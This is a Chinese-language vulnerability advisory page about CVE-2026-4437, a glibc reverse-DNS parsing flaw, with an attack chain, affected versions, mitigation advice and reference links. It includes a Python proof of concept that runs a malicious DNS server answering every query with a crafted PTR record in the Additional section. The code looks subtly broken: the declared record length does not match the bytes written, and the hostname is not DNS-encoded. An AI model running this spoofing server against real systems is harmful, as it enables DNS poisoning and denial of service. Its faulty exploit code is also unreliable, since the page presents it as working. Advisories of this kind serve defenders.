CVE-2026-4437 CVSS 7.5 高危

CVE-2026-4437 glibc DNS解析逻辑漏洞

披露日期: 2026-03-20

来源: 3ff69d7a-14f2-4f67-a097-88dee7810d18

漏洞信息

漏洞编号

CVE-2026-4437

漏洞类型

DNS欺骗

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GNU C Library (glibc)

漏洞概述

GNU C Library (glibc) 2.34至2.43版本中存在安全漏洞。当调用gethostbyaddr或gethostbyaddr_r处理DNS响应时，若配置了特定DNS后端，攻击者可利用特制的DNS响应包，导致应用程序将非应答区域误判为有效应答，从而违反DNS规范。

技术细节

该漏洞发生在glibc的DNS解析模块中。当系统配置使用nsswitch.conf的DNS后端进行反向解析时，gethostbyaddr_r函数未能正确校验DNS响应包的章节结构。攻击者可控制或模拟DNS服务器，发送精心构造的响应包，将本应位于Answer Section的PTR记录放置在Additional Section中。由于glibc的解析逻辑缺陷，应用程序会将该非标准区域的数据视为合法的解析结果。这不仅可能导致DNS缓存投毒、IP欺骗，还可能因处理异常数据导致应用程序崩溃，造成拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者配置恶意的DNS服务器或劫持DNS流量。

STEP 2

步骤2

受害者系统上的应用程序调用gethostbyaddr发起反向DNS查询。

STEP 3

步骤3

攻击者向受害者发送特制的DNS响应包，将PTR记录置于非应答区域。

STEP 4

步骤4

glibc解析响应时错误处理非应答区域数据，导致应用程序接受伪造信息或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Malicious DNS server simulation for CVE-2026-4437
# This script listens for DNS queries and sends a crafted response
# where the answer is placed in the Additional section to trigger the bug.

def run_malicious_dns():
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('0.0.0.0', 53))
    print("[+] Malicious DNS server listening on port 53...")

    while True:
        try:
            data, addr = sock.recvfrom(1024)
            # Parse Query ID (first 2 bytes)
            query_id = struct.unpack('!H', data[:2])[0]
            
            # Construct a malicious DNS response
            # Flags: Response, Authoritative, No Error
            flags = 0x8180 
            # Questions: 1, Answer RRs: 0 (Trick: 0 answers), Authority RRs: 0, Additional RRs: 1
            counts = struct.pack('!HHHH', 1, 0, 0, 1) 
            
            # Echo back the query (simplified)
            question = data[12:] 
            
            # Craft PTR record in the Additional section
            # Name: compressed pointer to query name (0xC00C)
            # Type: PTR (12), Class: IN (1), TTL: 3600
            # Data Length: 18, Data: evil.example.com
            additional = b'\xc0\x0c' # Pointer to domain name in question
            additional += struct.pack('!HHIH', 12, 1, 3600, 18)
            additional += b'evil.example.com'
            additional += b'\x00' # End of name

            response = struct.pack('!HH', query_id, flags) + counts + question + additional
            
            sock.sendto(response, addr)
            print(f"[+] Sent crafted response to {addr}")
        except Exception as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    run_malicious_dns()

影响范围

GNU C Library 2.34

GNU C Library 2.35

GNU C Library 2.36

GNU C Library 2.37

GNU C Library 2.38

GNU C Library 2.39

GNU C Library 2.40

GNU C Library 2.41

GNU C Library 2.42

GNU C Library 2.43

防御指南

临时缓解措施

在nsswitch.conf中禁用DNS解析功能（如果业务允许），或配置防火墙过滤异常的DNS响应包结构。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4437
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4437
3 Details https://www.cvedetails.com/cve/CVE-2026-4437/
4 VulDB https://vuldb.com/cve/CVE-2026-4437
5 Link https://sourceware.org/bugzilla/show_bug.cgi?id=34014

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表